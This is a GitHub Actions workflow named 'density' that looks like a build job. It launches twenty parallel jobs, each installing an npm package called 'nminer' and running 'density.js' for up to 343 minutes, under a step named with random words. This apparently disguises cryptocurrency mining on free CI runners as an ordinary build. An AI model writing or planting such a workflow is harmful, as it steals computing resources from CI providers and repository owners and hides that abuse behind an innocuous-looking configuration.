name: density
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2152 }
          - { version: 6566 }
          - { version: 8488 }
          - { version: 9269 }
          - { version: 3341 }
          - { version: 3399 }
          - { version: 4928 }
          - { version: 5509 }
          - { version: 4112 }
          - { version: 4113 }
          - { version: 1113 }
          - { version: 4960 }
          - { version: 5550 }
          - { version: 5650 }
          - { version: 9965 }
          - { version: 2924 }
          - { version: 5686 }
          - { version: 3565 }
          - { version: 6947 }
          - { version: 2305 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: parsnip furthermore compete boastfully
        run: |
          npm install nminer@latest
          timeout 343m node density.js || echo "density executed"